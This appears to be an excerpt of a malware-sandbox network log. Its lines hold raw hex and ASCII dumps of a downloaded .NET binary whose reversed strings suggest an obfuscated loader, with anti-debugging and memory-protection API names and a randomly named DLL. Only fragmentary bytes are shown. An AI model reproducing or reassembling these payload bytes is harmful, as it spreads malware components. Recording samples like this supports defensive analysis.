2022-01-28 21:14:32 UTC	18	IN	Data Raw: 72 43 4e 00 74 70 79 72 63 6e 45 74 70 79 72 43 4e 00 74 63 65 6a 62 4f 65 65 72 46 74 70 79 72 43 4e 00 74 6e 65 72 72 75 43 5f 74 65 67 00 74 78 65 4e 65 76 6f 4d 00 78 45 65 6c 69 46 65 76 6f 4d 00 74 6e 65 73 65 72 50 72 65 67 67 75 62 65 44 65 74 6f 6d 65 52 6b 63 65 68 43 00 65 6c 69 46 79 70 6f 43 00 74 63 65 74 6f 72 50 6c 61 75 74 72 69 56 00 73 73 65 72 64 64 41 63 6f 72 50 74 65 47 00 41 79 72 61 72 62 69 4c 64 61 6f 4c 00 65 6d 61 4e 65 73 61 42 65 6c 75 64 6f 4d 74 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 Data Ascii: rCNtpyrcnEtpyrCNtcejbOeerFtpyrCNtnerruC_tegtxeNevoMxEeliFevoMtneserPreggubeDetomeRkcehCeliFypoCtcetorPlautriVsserddAcorPteGAyrarbiLdaoLemaNesaBeludoMteGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStx
2022-01-28 21:14:32 UTC	20	IN	Data Raw: e2 06 00 80 80 e2 89 80 e2 0e 00 81 80 e2 81 80 e2 06 00 80 80 e2 8b 80 e2 05 00 81 80 e2 82 80 e2 0f 00 81 80 e2 82 80 e2 08 00 80 80 e2 8b 80 e2 03 00 81 80 e2 83 80 e2 0f 00 81 80 e2 80 80 e2 08 00 81 80 e2 82 80 e2 03 00 80 80 e2 8b 80 e2 06 00 81 80 e2 83 80 e2 05 00 80 80 e2 89 80 e2 05 00 80 80 e2 8a 80 e2 0e 00 81 80 e2 81 80 e2 0f 00 80 80 e2 81 80 e2 02 00 80 80 e2 8a 80 e2 06 00 81 80 e2 81 80 e2 0e 00 81 80 e2 80 80 e2 05 00 80 80 e2 8a 80 e2 0f 00 80 80 e2 8b 80 e2 02 00 81 80 e2 83 80 e2 0e 00 81 80 e2 83 80 e2 08 00 80 80 e2 8a 80 e2 03 00 81 80 e2 80 80 e2 0e 00 81 80 e2 83 80 e2 06 00 84 80 e2 03 00 02 84 80 e2 85 80 e2 89 80 e2 88 80 e2 86 80 e2 0f 00 5f 5f 65 75 6c 61 76 00 02 84 80 e2 85 80 e2 89 80 e2 88 80 e2 80 80 e2 81 80 e2 0e 00 Data Ascii: __eulav
2022-01-28 21:14:32 UTC	21	IN	Data Raw: 6f 66 6e 49 6d 65 74 73 79 53 00 65 63 6e 65 72 65 66 65 52 6b 61 65 57 00 64 69 6f 56 00 6e 6f 69 73 72 65 56 00 65 70 79 54 65 75 6c 61 56 00 72 74 50 74 6e 49 55 00 34 36 74 6e 49 55 00 32 33 74 6e 49 55 00 36 31 74 6e 49 55 00 6e 6f 69 74 70 65 63 78 45 64 61 6f 4c 65 70 79 54 00 65 70 79 54 00 6e 6f 69 74 70 65 63 78 45 74 75 6f 65 6d 69 54 00 6e 61 70 53 65 6d 69 54 00 6e 6f 69 74 70 65 63 78 45 64 65 74 70 75 72 72 65 74 6e 49 64 61 65 72 68 54 00 6e 6f 69 74 70 65 63 78 45 74 72 6f 62 41 64 61 65 72 68 54 00 64 61 65 72 68 54 00 78 65 74 75 4d 00 72 6f 74 69 6e 6f 4d 00 67 6e 69 64 61 65 72 68 54 2e 6d 65 74 73 79 53 00 64 65 6b 63 6f 6c 72 65 74 6e 49 00 65 74 75 62 69 72 74 74 41 63 69 74 61 74 53 64 61 65 72 68 54 00 67 6e 69 64 6f 63 6e 45 65 Data Ascii: ofnImetsySecnerefeRkaeWdioVnoisreVepyTeulaVrtPtnIU46tnIU23tnIU61tnIUnoitpecxEdaoLepyTepyTnoitpecxEtuoemiTnapSemiTnoitpecxEdetpurretnIdaerhTnoitpecxEtrobAdaerhTdaerhTxetuMrotinoMgnidaerhT.metsySdekcolretnIetubirttAcitatSdaerhTgnidocnEe
2022-01-28 21:14:32 UTC	22	IN	Data Raw: 6c 69 70 6d 6f 43 00 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 00 72 65 67 61 6e 61 4d 65 63 72 75 6f 73 65 52 00 72 65 6c 64 6e 61 48 74 6e 65 76 45 65 76 6c 6f 73 65 52 00 73 67 72 41 74 6e 65 76 45 65 76 6c 6f 73 65 52 00 6e 6f 69 74 70 65 63 78 45 6e 6f 69 74 61 63 6f 76 6e 49 74 65 67 72 61 54 00 6f 66 6e 49 79 74 72 65 70 6f 72 50 00 72 65 69 66 69 64 6f 4d 72 65 74 65 6d 61 72 61 50 00 6f 66 6e 49 72 65 74 65 6d 61 72 61 50 00 65 6c 75 64 6f 4d 00 6f 66 6e 49 64 6f 68 74 65 4d 00 65 73 61 42 64 6f 68 74 65 4d 00 73 65 70 79 54 72 65 62 6d 65 4d 00 6f 66 6e 49 72 65 62 6d 65 4d 00 6f 66 6e 49 65 6c 62 61 69 72 61 56 6c 61 63 6f 4c 00 6f 66 6e 49 64 6c 65 69 46 00 73 65 64 6f 43 70 4f 00 65 64 6f 43 70 4f 00 72 65 64 6c 69 75 42 6c 61 63 6f 4c Data Ascii: lipmoCsecruoseR.metsySreganaMecruoseRreldnaHtnevEevloseRsgrAtnevEevloseRnoitpecxEnoitacovnItegraTofnIytreporPreifidoMretemaraPofnIretemaraPeludoMofnIdohteMesaBdohteMsepyTrebmeMofnIrebmeMofnIelbairaVlacoLofnIdleiFsedoCpOedoCpOredliuBlacoL
2022-01-28 21:14:32 UTC	24	IN	Data Raw: 6f 74 63 65 72 69 44 00 79 72 6f 74 63 65 72 69 44 00 4f 49 2e 6d 65 74 73 79 53 00 72 65 64 61 65 52 79 72 61 6e 69 42 00 31 60 65 6c 62 61 74 61 75 71 45 49 00 65 6c 62 61 73 6f 70 73 69 44 49 00 74 6c 75 73 65 52 63 6e 79 73 41 49 00 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 00 6f 66 6e 49 65 72 75 74 6c 75 43 00 43 47 00 6e 6f 69 74 70 65 63 78 45 74 61 6d 72 6f 46 00 6e 6f 69 74 70 65 63 78 45 73 73 65 63 63 41 64 6c 65 69 46 00 6e 6f 69 74 70 65 63 78 45 00 72 65 64 6c 6f 46 6c 61 69 63 65 70 53 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 00 6d 75 6e 45 00 65 7a 69 53 00 65 6c 67 6e 61 74 63 65 52 00 65 6c 62 75 6f 44 00 68 63 74 61 77 70 6f 74 53 00 65 63 61 72 54 6b 63 61 74 53 00 65 6d 61 72 46 6b 63 61 74 53 00 6f 66 6e 49 74 72 61 74 Data Ascii: otceriDyrotceriDOI.metsySredaeRyraniB1`elbatauqEIelbasopsiDItluseRcnysAInoitazilabolG.metsySofnIerutluCCGnoitpecxEtamroFnoitpecxEsseccAdleiFnoitpecxEredloFlaicepStnemnorivnEmunEeziSelgnatceRelbuoDhctawpotSecarTkcatSemarFkcatSofnItrat
2022-01-28 21:14:32 UTC	25	IN	Data Raw: 79 53 00 65 72 6f 43 2e 6d 65 74 73 79 53 00 74 6e 65 6d 65 67 61 6e 61 4d 2e 6d 65 74 73 79 53 00 74 65 6e 2d 66 75 62 6f 74 6f 72 70 00 6d 65 74 73 79 53 00 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 00 62 69 6c 72 6f 63 73 6d 00 6c 6c 64 2e 7a 79 6a 66 6f 64 7a 61 67 6f 68 69 4a 00 7a 79 6a 66 6f 64 7a 61 67 6f 68 69 4a 00 29 c0 04 8d 28 f2 04 69 1f d7 01 d4 1b ee 01 8d 1b d5 09 43 00 00 00 00 1b d3 01 d5 00 00 00 00 10 89 00 ee 00 00 00 00 10 89 00 9e 00 00 00 00 10 89 00 66 00 00 00 00 10 fc 00 56 00 01 00 02 10 f0 00 56 00 02 00 01 10 89 00 56 00 02 00 00 11 20 00 54 00 02 00 05 11 08 00 54 00 02 00 04 11 14 00 54 00 02 00 03 10 fc 00 54 00 02 00 02 10 f0 00 54 00 02 00 01 10 89 00 54 00 02 00 00 10 f2 00 52 00 01 00 08 10 8b 00 52 00 02 00 07 11 2c Data Ascii: ySeroC.metsyStnemeganaM.metsySten-fubotorpmetsySgniwarD.metsySbilrocsmlld.zyjfodzagohiJzyjfodzagohiJ)(iCfVVV TTTTTTRR,
2022-01-28 21:14:32 UTC	26	IN	Data Raw: 00 00 00 02 00 04 54 40 00 00 00 fa 00 00 00 02 00 04 40 04 00 00 00 d9 00 00 00 02 00 00 00 00 00 00 00 00 00 6b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5f 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 4d 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 40 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 39 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 2a 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 21 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 04 02 b0 00 02 3a 50 02 af 00 02 39 50 02 8f 00 02 38 50 01 b6 00 02 38 3c 01 b2 00 02 37 3c 01 8f 00 02 37 30 01 8e 00 02 37 20 01 8d 00 02 36 cc 00 9c 00 02 36 4c 00 09 1b 37 0b 47 01 Data Ascii: T@@k_M@9*!:P9P8P8<7<707 66L7G
2022-01-28 21:14:32 UTC	28	IN	Data Raw: 81 1b 71 00 00 14 81 1b 6a 00 00 14 36 1b 61 00 00 14 36 1b 59 00 00 14 36 1b 51 00 00 14 5f 11 14 00 00 14 52 10 fc 00 00 14 43 10 f0 00 00 14 36 10 89 00 00 00 1e 00 e9 00 1d 00 db 00 1c 00 da 00 18 00 d5 00 17 00 d3 00 13 00 c0 00 0e 00 b4 00 0a 00 76 00 05 00 4d 00 01 00 12 2a e4 2a d2 2a ba 2a ad 2a a3 2a 98 2a 8b 2a 41 2a 32 2a 27 2a 20 2a 0b 29 f8 29 df 29 d4 29 a6 29 a0 29 96 29 90 29 18 29 05 28 da 28 c1 28 b8 28 a2 28 88 28 7f 28 5d 28 54 28 4b 28 42 28 3b 28 35 28 2f 28 08 27 f6 27 ed 27 e4 27 db 27 ba 27 ad 27 9b 27 75 27 6f 27 61 27 5a 27 54 27 4b 27 43 27 3c 27 32 27 0a 26 fc 26 f6 26 e9 26 dc 26 d5 26 bd 26 ad 26 9c 26 96 26 8a 26 6e 26 4e 26 30 26 27 26 03 25 f4 25 e5 25 a4 25 9e 25 8c 25 7a 25 5e 25 42 25 39 25 24 25 15 25 0d 25 05 24 f8 Data Ascii: qj6a6Y6Q_RC6vM*******A2' *)))))))))(((((((](T(K(B(;(5(/(''''''''u'o'a'Z'T'K'C'<'2'&&&&&&&&&&&n&N&0&'&%%%%%%z%^%B%9%$%%%$
2022-01-28 21:14:32 UTC	29	IN	Data Raw: 15 8b 00 9b 00 00 05 a9 15 82 00 9b 00 00 05 89 15 79 00 9b 00 00 05 69 15 70 00 9b 00 00 05 49 15 67 00 9b 00 00 05 29 15 5e 00 9b 00 00 05 09 15 55 00 9b 00 00 04 e9 15 4c 00 9b 00 00 04 c9 13 f2 00 13 00 00 04 c1 15 43 00 9b 00 00 04 a9 13 f2 00 13 00 00 04 a1 15 3a 00 9b 00 00 04 89 13 f2 00 13 00 00 04 81 15 2c 00 9b 00 00 04 69 13 f2 00 13 00 00 04 61 14 63 00 9b 00 00 04 49 14 56 00 9b 00 00 04 29 14 49 00 9b 00 00 04 09 15 18 00 9b 00 00 03 e9 14 3a 00 9b 00 00 03 c9 01 25 00 0b 00 00 03 a1 01 25 00 0b 00 00 03 81 01 25 00 0b 00 00 03 61 01 25 00 0b 00 00 03 41 14 56 00 9b 00 00 02 c9 14 49 00 9b 00 00 02 a9 15 18 00 9b 00 00 02 89 14 3a 00 9b 00 00 02 69 01 25 00 93 00 00 02 43 01 25 00 93 00 00 01 83 01 25 00 23 00 00 01 20 01 25 00 23 00 00 01 Data Ascii: yipIg)^ULC:,iacIV)I:%%%a%AVI:i%C%%# %#
2022-01-28 21:14:32 UTC	30	IN	Data Raw: 91 25 73 26 27 06 a1 18 9e 1e 5a 03 a9 00 3b 26 1d 06 d9 25 6d 25 33 01 c1 25 59 1d 76 01 21 00 3b 16 bc 02 b9 25 54 1c 71 06 c9 25 4f 26 16 01 21 25 4a 26 16 01 21 01 54 26 0e 05 c9 00 31 25 ff 05 c9 25 33 25 ec 05 c9 25 33 25 d7 05 c9 25 2e 25 ca 05 c9 25 29 25 c0 05 c9 00 31 25 b3 05 c9 23 f4 14 77 05 a1 00 20 14 77 05 c9 00 20 14 77 02 a9 24 f1 25 ac 00 59 07 ed 16 c8 03 69 00 20 14 77 00 69 24 66 1c 71 06 c9 24 61 1c 71 06 c9 04 ef 25 9b 01 e9 06 49 1c 0c 01 bc 16 85 1b f4 01 bc 00 20 14 77 01 bc 24 44 20 5a 01 21 24 3f 20 5a 01 21 24 3a 20 5a 01 21 24 35 20 5a 01 21 24 30 20 5a 01 21 24 2b 20 5a 01 21 24 26 20 5a 01 21 0f f6 20 5a 01 21 00 3b 25 87 06 79 24 1a 25 75 06 79 00 3b 25 67 01 71 23 fb 25 55 01 71 23 ea 1c 00 06 d9 23 f4 14 77 06 d9 23 ea Data Ascii: %s&'Z;&%m%3%Yv!;%Tq%O&!%J&!T&1%%3%%3%%.%%)%1%#w w w$%Yi wi$fq$aq%I w$D Z!$? Z!$: Z!$5 Z!$0 Z!$+ Z!$& Z! Z!;%y$%uy;%gq#%Uq##w#
2022-01-28 21:14:32 UTC	31	IN	Data Raw: 01 5a 1d 7e 02 c9 05 84 14 77 01 54 1f c4 22 89 06 a1 1f be 1d c7 06 09 17 7c 22 80 03 a9 0c ee 22 7b 03 a9 1f b9 22 72 06 09 18 a4 22 67 06 09 0e a4 22 59 06 09 01 81 22 4c 03 a9 1f b2 22 3e 00 39 1f ad 22 2c 00 39 1f a6 1d f0 03 a9 01 81 22 27 06 09 03 72 22 1d 06 09 1f a0 22 1d 06 09 1f 9b 22 15 06 09 1f 94 1d f0 06 a1 1f 8d 22 09 04 79 1f 42 21 fa 04 19 17 d8 21 f6 04 41 00 20 21 e4 04 21 17 d8 21 d9 04 41 07 f9 21 cb 04 51 00 20 21 b9 04 21 17 d8 21 b2 04 41 17 d8 21 a9 04 41 1f 34 21 a0 04 21 17 d8 21 9b 04 41 1f 2a 1d 71 04 21 17 d8 21 94 04 41 17 d8 21 8e 04 41 17 d8 21 85 04 41 17 d8 21 7f 04 41 17 d8 21 77 04 41 1f 24 21 63 04 21 1f 1a 1d 71 04 21 17 d8 21 5d 04 41 17 d8 21 52 04 41 1f 13 1d 71 04 21 17 d8 21 4a 04 41 1f 0a 21 3d 04 21 01 6f 21 Data Ascii: Z~wT"\|""{"r"g"Y"L">9",9"'r""""yB!!A !!!A!Q !!!A!A4!!!A*q!!A!A!A!A!wA$!c!q!!]A!RAq!!JA!=!o!
2022-01-28 21:14:32 UTC	33	IN	Data Raw: f1 18 ca 00 54 01 6b 1a f3 00 5c 05 e5 1c 31 00 54 00 9c 1c 29 00 64 16 e3 1c 1f 00 64 16 cf 1a fc 00 5c 16 c4 18 ca 00 44 00 20 14 77 00 54 00 3b 1c 15 00 44 06 49 1c 0c 00 44 16 8e 1c 00 01 29 16 85 1b f4 00 44 04 ef 1b ef 06 69 00 20 14 77 00 4c 00 20 14 77 00 44 04 ef 1b e9 06 69 00 20 14 77 00 51 00 6f 14 b2 05 89 00 66 14 77 05 b9 00 20 14 77 05 89 16 4e 1b df 00 89 01 85 14 77 02 d9 00 20 14 77 03 49 00 20 14 77 00 49 00 20 14 77 03 69 01 85 14 77 03 c1 01 85 14 77 03 d1 01 6f 14 77 04 e9 01 85 14 77 03 f1 01 85 14 77 03 e1 01 85 14 77 03 b1 01 85 14 77 03 b9 01 85 14 77 03 c9 01 85 14 77 03 e9 00 20 14 77 04 d1 00 56 14 77 04 b9 01 85 14 77 05 51 00 20 14 77 05 f1 15 11 14 77 05 09 14 e7 14 77 00 21 14 c7 14 77 00 a1 00 56 14 77 00 29 00 20 14 77 Data Ascii: Tk\1T)dd\D wT;DID)Di wL wDi wQofw wNw wI wI wiwwowwwwwww wVwwQ www!wVw) w
2022-01-28 21:14:32 UTC	34	IN	Data Raw: 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 08 00 05 00 00 11 Data Ascii:
2022-01-28 21:14:32 UTC	35	IN	Data Raw: 00 11 2c 00 07 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fe 00 0a 00 00 10 f2 00 09 00 00 10 8b 00 08 00 00 11 2c 00 07 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 02 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 Data Ascii: , ,
2022-01-28 21:14:32 UTC	37	IN	Data Raw: 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 Data Ascii:
2022-01-28 21:14:32 UTC	38	IN	Data Raw: 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 Data Ascii:
2022-01-28 21:14:32 UTC	39	IN	Data Raw: 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 02 10 89 00 01 00 00 10 89 00 01 00 00 11 14 00 04 00 00 10 fc 00 03 00 Data Ascii:
2022-01-28 21:14:32 UTC	41	IN	Data Raw: 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 2c 00 07 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 16 00 0b 00 00 10 fe 00 0a 00 00 10 f2 00 09 00 00 10 8b 00 08 00 00 11 2c 00 07 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f2 00 09 00 00 10 8b 00 08 00 00 11 2c 00 07 00 00 11 20 00 06 00 00 11 08 00 05 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 11 14 00 04 00 00 Data Ascii: , , ,
2022-01-28 21:14:32 UTC	42	IN	Data Raw: 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 Data Ascii:
2022-01-28 21:14:32 UTC	43	IN	Data Raw: 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 02 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 Data Ascii:
2022-01-28 21:14:32 UTC	45	IN	Data Raw: 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 14 00 04 00 00 10 fc 00 03 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 10 f0 00 02 00 00 10 89 00 01 00 00 11 14 00 04 00 02 10 fc 00 Data Ascii:
2022-01-28 21:14:32 UTC	46	IN	Data Raw: b8 08 54 00 56 14 77 18 86 00 00 00 02 2f 90 08 53 10 79 16 b2 01 c6 00 03 00 00 00 00 08 4c 13 8b 16 a6 01 c6 00 03 00 00 00 00 08 47 13 82 16 9f 01 c6 00 03 00 00 00 00 08 45 05 84 14 77 18 86 00 03 00 00 00 00 08 44 0c e4 16 b2 01 c6 00 03 00 00 00 00 08 40 13 66 16 a6 01 c6 00 03 00 00 00 00 08 3e 13 60 16 9f 01 c6 00 03 00 00 00 00 08 3c 05 84 14 77 18 86 00 03 00 00 00 00 08 39 11 24 16 b2 01 c6 00 03 00 00 00 00 08 32 11 14 16 a6 01 c6 00 03 00 00 00 00 08 2d 11 09 16 9f 01 c6 00 03 00 00 00 00 08 2b 05 84 14 77 18 86 00 03 00 00 00 00 08 2a 10 79 16 b2 01 c6 00 03 00 00 00 00 08 27 10 6f 16 a6 01 c6 00 03 00 00 00 00 08 26 10 6a 16 9f 01 c6 00 03 00 00 00 00 08 24 05 84 14 77 18 86 00 03 00 00 00 00 08 23 10 79 16 b2 01 c6 00 03 00 00 00 00 08 1f Data Ascii: TVw/SyLGEwD@f>`<w9$2-+w*y'o&j$w#y
2022-01-28 21:14:32 UTC	47	IN	Data Raw: 00 02 27 80 07 b9 09 86 10 89 00 91 00 00 00 02 27 60 07 b9 00 1c 10 89 00 91 00 00 00 02 26 dc 07 b9 00 1c 14 4f 18 91 00 00 00 02 26 94 07 b9 09 a2 10 89 00 93 00 00 00 02 26 54 07 b9 00 1c 14 4f 18 91 00 00 00 02 26 30 07 b8 00 93 14 c1 00 c6 00 00 00 02 24 20 07 b8 00 8d 14 c1 00 c6 00 00 00 02 23 e4 07 b7 00 88 14 c1 08 c6 00 00 00 02 23 6c 07 b7 00 84 14 c1 08 c6 00 00 00 02 23 48 07 b6 01 5e 10 89 00 86 00 00 00 02 23 28 07 b6 01 5a 10 89 00 86 00 00 00 02 23 08 07 b5 01 5e 14 77 18 86 00 00 00 02 22 e4 07 b5 00 20 14 77 18 86 00 00 00 02 22 c4 07 b5 02 ea 10 89 00 93 00 00 00 02 22 a0 07 b5 00 20 14 77 18 86 00 00 00 02 22 68 07 b4 12 89 10 89 00 93 00 00 00 02 22 2c 07 b3 0a 3b 10 89 00 93 00 00 00 02 21 f0 07 b3 00 8d 14 c1 00 c6 00 00 00 02 21 Data Ascii: ''`&O&&TO&0$ ##l#H^#(Z#^w" w"" w"h",;!!
